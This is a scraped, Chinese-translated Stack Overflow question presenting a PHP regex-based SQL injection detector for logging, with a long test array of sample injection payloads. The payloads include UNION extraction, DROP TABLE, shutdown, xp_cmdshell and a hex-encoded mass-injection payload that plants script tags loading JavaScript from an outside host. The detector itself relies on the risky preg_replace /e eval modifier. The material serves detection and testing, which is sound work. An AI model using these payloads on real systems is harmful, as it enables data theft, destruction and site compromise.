个人中心
文章发布
退出
作者热门文章
- r - 以节省内存的方式增长 data.frame
- ruby-on-rails - ruby/ruby on rails 内存泄漏检测
- android - 无法解析导入android.support.v7.app
- UNIX 域套接字与共享内存(映射文件)
29
4
周末我整理了一个正则表达式列表来检查 GET、POST 和 COOKIE super 全局变量中的 sql 注入(inject)。从各方面来看,它们在检测是否发现 sql 注入(inject)方面非常有效。我已经运行了很多我在各种 sql 注入(inject)文档中看到的注入(inject)攻击,但我正在寻找可能无法解释的更复杂的攻击。</strong>
我很清楚最好的防御方法是验证/清理输入和参数化查询,但是这个脚本不是为了保护而设计的,而只是记录潜在的攻击。</strong>我也知道这会在各种情况下产生误报,但由于它仅用于记录日志,因此问题不大。
检测脚本如下。
<?php
testArray($_GET);
testArray($_POST);
testArray($_COOKIE);
function testArray($array)
{
foreach ($array as $name => $value)
{
if(is_array($value) === true)
{
testArray($value);
}
else
{
testHelper($value);
}
}
}
function testHelper($varvalue)
{
$total = test($varvalue);
echo '<h3 style="'.($total > 0 ? 'color:red;' : 'color:green;').'">'.nl2br($varvalue).'</h3>';
echo '<span style="'.($total > 0 ? 'color:red;' : 'color:green;').'">';
echo 'total = '.$total.'
';
echo '</span><br />';
}
function test($varvalue, $_comment_loop=false)
{
$total = 0;
$varvalue_orig = $varvalue;
$quote_pattern = '\%27|\'|\%22|\"|\%60|`';
// detect base64 encoding
if(preg_match('/^[a-zA-Z0-9\/+]*={0,2}$/', $varvalue) > 0 && base64_decode($varvalue) !== false)
{
$varvalue = base64_decode($varvalue);
}
// detect and remove comments
if(preg_match('!/\*.*?\*/!s', $varvalue) > 0)
{
if($_comment_loop === false)
{
$total += test($varvalue_orig, true);
$varvalue = preg_replace('!/\*.*?\*/!s', '', $varvalue);
}
else
{
$varvalue = preg_replace('!/\*.*?\*/!s', ' ', $varvalue);
}
$varvalue = preg_replace('/\n\s*\n/', "\n", $varvalue);
}
$varvalue = preg_replace('/((\-\-|\#)([^\\n]*))\\n/si', ' ', $varvalue);
// detect and replace hex encoding
// detect and replace decimal encodings
if(preg_match_all('/&#x([0-9]{2});/', $varvalue, $matches) > 0 || preg_match_all('/&#([0-9]{2})/', $varvalue, $matches) > 0)
{
// replace numeric entities
$varvalue = preg_replace('/&#x([0-9a-f]{2});?/ei', 'chr(hexdec("\\1"))', $varvalue);
$varvalue = preg_replace('/&#([0-9]{2});?/e', 'chr("\\1")', $varvalue);
// replace literal entities
$trans_tbl = get_html_translation_table(HTML_ENTITIES);
$trans_tbl = array_flip($trans_tbl);
$varvalue = strtr($varvalue, $trans_tbl);
}
$and_pattern = '(\%41|a|\%61)(\%4e|n|%6e)(\%44|d|\%64)';
$or_pattern = '(\%6F|o|\%4F)(\%72|r|\%52)';
$equal_pattern = '(\%3D|=)';
$regexes = array(
'/(\-\-|\#|\/\*)\s*$/si',
'/('.$quote_pattern.')?\s*'.$or_pattern.'\s*(\d+)\s*'.$equal_pattern.'\s*\\4\s*/si',
'/('.$quote_pattern.')?\s*'.$or_pattern.'\s*('.$quote_pattern.')(\d+)\\4\s*'.$equal_pattern.'\s*\\5\s*/si',
'/('.$quote_pattern.')?\s*'.$or_pattern.'\s*(\d+)\s*'.$equal_pattern.'\s*('.$quote_pattern.')\\4\\6?/si',
'/('.$quote_pattern.')?\s*'.$or_pattern.'\s*('.$quote_pattern.')?(\d+)\\4?/si',
'/('.$quote_pattern.')?\s*'.$or_pattern.'\s*('.$quote_pattern.')([^\\4]*)\\4\\5\s*'.$equal_pattern.'\s*('.$quote_pattern.')/si',
'/((('.$quote_pattern.')\s*)|\s+)'.$or_pattern.'\s+([a-z_]+)/si',
'/('.$quote_pattern.')?\s*'.$or_pattern.'\s+([a-z_]+)\s*'.$equal_pattern.'\s*(d+)/si',
'/('.$quote_pattern.')?\s*'.$or_pattern.'\s+([a-z_]+)\s*'.$equal_pattern.'\s*('.$quote_pattern.')/si',
'/('.$quote_pattern.')?\s*'.$or_pattern.'\s*('.$quote_pattern.')([^\\4]+)\\4\s*'.$equal_pattern.'\s*([a-z_]+)/si',
'/('.$quote_pattern.')?\s*'.$or_pattern.'\s*('.$quote_pattern.')([^\\4]+)\\4\s*'.$equal_pattern.'\s*('.$quote_pattern.')/si',
'/('.$quote_pattern.')?\s*\)\s*'.$or_pattern.'\s*\(\s*('.$quote_pattern.')([^\\4]+)\\4\s*'.$equal_pattern.'\s*('.$quote_pattern.')/si',
'/('.$quote_pattern.'|\d)?(;|%20|\s)*(union|select|insert|update|delete|drop|alter|create|show|truncate|load_file|exec|concat|benchmark)((\s+)|\s*\()/ix',
'/from(\s*)information_schema.tables/ix',
);
foreach ($regexes as $regex)
{
$total += preg_match($regex, $varvalue);
}
return $total;
}
对于懒惰的人...这里有一些示例攻击。
testArray(array(
"' or 1=1--",
"' or 1-- ",
"' or 1-- adasd ",
"' or 1",
"\" or '1'",
"' or 1=1--",
"or 1=1--",
"' OR ''='",
"' or 'a'='a",
'" or "a"="a',
"') or ('a'='a",
"'; exec master..xp_cmdshell 'ping 10.10.1.2'--",
"'; EXEC master..sp_makewebtask \"\\10.10.1.3\share\output.html\", \"SELECT * FROM INFORMATION_SCHEMA.TABLES\"",
"10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--",
"10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--",
"' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='",
"' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '__w%') AND ''='",
"'OR''='",
"' OR EXISTS(SELECT 1 FROM dual WHERE database() LIKE '%j%') AND ''='",
"' OR EXISTS(SELECT * FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA='test' AND TABLE_NAME='one') AND ''='",
"' OR (SELECT COUNT(*) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA LIKE '%j%')>1 AND ''='",
"' OR (SELECT COUNT(*) FROM users)>10 AND ''='",
"' OR EXISTS(SELECT * FROM users WHERE name LIKE '%r%') AND ''='",
"' OR EXISTS(SELECT * FROM users WHERE name!='jake' AND name LIKE '%a%') AND ''='",
"' or '1'='1' -- '",
"' or '1'='1' ({ '",
"' or '1'='1' /* '",
"1;DROP TABLE `users`",
"10;DROP members --",
"x' AND email IS NULL; --",
"x' AND 1=(SELECT COUNT(*) FROM tabname); --",
"x' AND members.email IS NULL; --",
"x';
INSERT INTO members ('email','passwd','login_id','full_name')
VALUES ('steve@unixwiz.net','hello','steve','Steve Friedl');--",
"x';
UPDATE members
SET email = 'steve@unixwiz.net'
WHERE email = 'bob@example.com",
"23 OR 1=1",
"23' OR 1=1",
"\''; DROP TABLE users; --",
"Bill O''Reilly",
"the new album'\"s and totally shit....get back to glasgow and write some good tunes.",
"the new album's and totally shit....get back to glasgow and write some good tune's.",
"the new album's and totally shit.....",
"lee crossan",
"\"123\"",
"111 /*This is my comment...*/UN/*Can You*/IO/*Find It*/N/**/ S/**/E/*
*/LE/*Another comment to*/CT/*Find. Can you dig*//*it*/*",
"1 UNION SELECT ALL FROM WHERE",
"1 UNION SELECT ALL FROM WHERE",
"71985' OR 1 = 1",
"71985 OR 1 = 1",
"71985 OR 1 =1",
"71985 OR 1=1",
"71985 OR 1= 1",
"71985' OR '1'= 1",
"71985 OR '1'= 1",
"71985 OR 1= '1'",
"71985 OR '5555",
"71985 OR '' = '",
"71985 OR '' = \"",
"71985 OR ' ' = \" ",
"71985 OR '_' = \"_",
"71985 OR user_id",
"71985 OR user_id=123",
"71985 OR user_id =123",
"71985 OR user_id ='asd",
"71985 OR 'asd' = user_id",
"71985 OR user_id = user_id",
"71985 OR 'a' = 'a",
"71985 OR 'a' = '",
"71985 OR 'a' = 'a';--",
"71985 OR 'a' = 'a';",
"preg_match('/^[a-zA-Z0-9\/+]*={0,2}$/', \$varvalue) > 0 && base64_decode(\$varvalue) !== false)",
'1 AND ISNULL(ASCII(SUBSTRING((SELECT TOP 1 name FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 0 name FROM sysObjects WHERE xtYpe=0x55)),1,1)),0)>78-- ',
'ar/news/global/2008/12/16/radio_1_christmas_show',
'202534599.1295899315.1.1.utmcsr=xxx.xxx.de|utmccn=(referral)|utmcmd=referral|utmcct=/xxx/xxx/blog/dc11656b/',
'Aptly describes how a close-minded society can make a person feel. To think that this same society would target young adolescents is unconscionable. Thanks for the song.',
'; SELECT(xxxx) ',
'Aptly describes how a close-minded society can make a person feel. Thanks for the song.',
"';DECLARE @S CHAR(4000);SET @S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777322E73383030716E2E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72 AS CHAR(4000));EXEC(@S);",
'; SELECT LOAD_FILE(0x633A5C626F6F742E696E69)',
'SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))',
'SELECT CHAR(75)+CHAR(76)+CHAR(77)',
'SELECT login || \'-\' || password FROM members',
'DROP/*comment*/sampletable',
';DR/**/OP/*bypass blacklisting*/sampletable',
';DR/**/OP/*bypass blacklisting*/ sampletable',
';DR/*
*/OP/*bypass blacklisting*/ sampletable',
';DR--
OP--
sampletable',
';DROP-- eranious data
TABLE --
sampletable',
'1;SELECT/*avoid-spaces*/password/**/FROM/**/Members ',
'SELECT /*!32302 1/0, */ 1 FROM tablename',
"' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--",
"1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055",
"-1 UNION ALL SELECT null, null, NULL, NULL, convert(image,1), null, null,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULl, NULL-- ",
"11223344) UNION SELECT NULL,NULL,NULL,NULL WHERE 1=2 –- ",
"11223344) UNION SELECT 1,’2’,NULL,NULL WHERE 1=2 –- ",
",0 UNION ALL SELECT 1,'x'/*,10 ;",
"';shutdown --",
"(SELECT id FROM sysobjects WHERE name = 'tablenameforcolumnnames')",
"BENCHMARK(howmanytimes, do this)",
"BENCHMARK (howmanytimes, do this)",
"1 union select benchmark(500000,sha1 (0x414141)),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1",
"this is not a attack but --
plain text comment that someone could write.
",
"what about this; or that or them!",
));
所以主要问题是 - 您能否通过此测试函数获得 sql 注入(inject) - 如果是的话 - 它是什么?
最佳答案
您可能想查看 PHPIDS 测试套件,例如 this one
关于php - SQL 注入(inject)检测 - 已编译正则表达式......寻找测试注入(inject),我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/6174691/
29
4
0
这是一个与 Get OS-Version in WinRT Metro App C# 相关的问题但不是它的重复项。 是否有任何选项可以从 Metro 应用程序检测系统上是否有可用的桌面功能?据我所知,
我想在闹钟响起时做点什么。例如, toast 或设置新闹钟。我正在寻找可以检测闹钟何时响起的东西。首先,我在寻找广播 Action ,但找不到。也许是我的错? 当闹钟响起时,还有其他方法可以做些什么吗
如果某个 JS 添加了一个突变观察者,其他 JS 是否有可能检测、删除、替换或更改该观察者?我担心的是,如果某些 JS 旨在破坏某些 DOM 元素而不被发现,那么 JS 可能想要摆脱任何观察该 DOM
Closed. This question does not meet Stack Overflow guidelines。它当前不接受答案。 想要改善这个问题吗?更新问题,以便将其作为on-topi
有没有办法在您的 Activity/应用程序中(以编程方式)知道用户已通过 USB 将您的手机连接到 PC? 最佳答案 有人建议使用 UMS_CONNECTED自最新版本的 Android 起已弃用
我正在想办法测量速度滚动事件,这将产生某种代表速度的数字(相对于所花费的时间,从滚动点 A 到点 B 的距离)。 我欢迎任何以伪代码形式提出的建议...... 我试图在网上找到有关此问题的信息,但找不
某些 JavaScript 是否可以检测 Skype 是否安装? 我问的原因是我想基于此更改链接的 href:如果未安装 Skype,则显示一个弹出窗口,解释 Skype 是什么以及如何安装它,如果已
我们正在为 OS X 制作一个使用 Quartz Events 移动光标的用户空间设备驱动程序,当游戏(尤其是在窗口模式下运行的游戏)无法正确捕获鼠标指针时,我们遇到了问题(= 将其包含/保留在其窗口
我可以在 Controller 中看到事件 $routeChangeStart,但我不知道如何告诉 Angular 留下来。我需要弹出类似“您要保存、删除还是取消吗?”的信息。如果用户选择取消,则停留
我正在解决一个问题,并且已经花了一些时间。问题陈述:给你一个正整数和负整数的数组。如果索引处的数字 n 为正,则向前移动 n 步。相反,如果为负数(-n),则向后移动 n 步。假设数组的第一个元素向前
我试图建立一个条件,其中 [i] 是 data.length 的值,问题是当有超过 1 个值时一切正常,但当只有 1 个值时,脚本不起作用。 out.href = data[i].hr
这是我的问题,我需要检测图像中的 bolt 和四分之一,我一直在搜索并找到 OpenCV,但据我所知它还没有在 Java 中。你们打算如何解决这个问题? 最佳答案 实际上有一个 OpenCV 的 Ja
是否可以检测 ping? IE。设备 1 ping 设备 2,我想要可以在设备 2 上运行的代码,该代码可以在设备 1 ping 设备时进行检测。 最佳答案 ping 实用程序使用的字面消息(“ICM
我每天多次运行构建脚本。我的感觉是我和我的同事花费了大量时间等待这个脚本执行。现在想知道:我们每天花多少时间等待脚本执行? .我可以对总体平均值感到满意,即使我真的很想拥有每天的数据(例如“上周一我们
我已经完成了对项目的编码,但是当我在客户端中提交了源代码时,就对它进行了测试,然后检测到内存泄漏。我已经在Instruments using Leaks中进行了测试。 我遇到的问题是AVPlayer和
我想我可以用 std.traits.functionAttributes 来做到这一点,但它不支持 static。对于任何类型的可调用对象(包含 opCall 的结构),我如何判断该可调用对象是否使用
我正在使用多核 R 包中的并行和收集函数来并行化简单的矩阵乘法代码。答案是正确的,但并行版本似乎与串行版本花费的时间相同。 我怀疑它仅在一个内核上运行(而不是在我的机器上可用的 8 个内核!)。有没有
我正在尝试在读取 csv 文件时编写一个这样的 if 语句: if row = [] or EOF: do stuff 我在网上搜索过,但找不到任何方法可以做到这一点。帮忙? 最佳答案 wit
我想捕捉一个 onFontSizeChange 事件然后做一些事情(比如重新渲染,因为浏览器已经改变了我的字体大小)。不幸的是,不存在这样的事件,所以我必须找到一种方法来做到这一点。 我见过有人在不可
我有一个使用 Windows 服务的 C# 应用程序,该服务并非始终打开,我希望能够在该服务启动和关闭时发送电子邮件通知。我已经编写了电子邮件脚本,但我似乎无法弄清楚如何检测服务状态更改。 我一直在阅
我是一名优秀的程序员,十分优秀!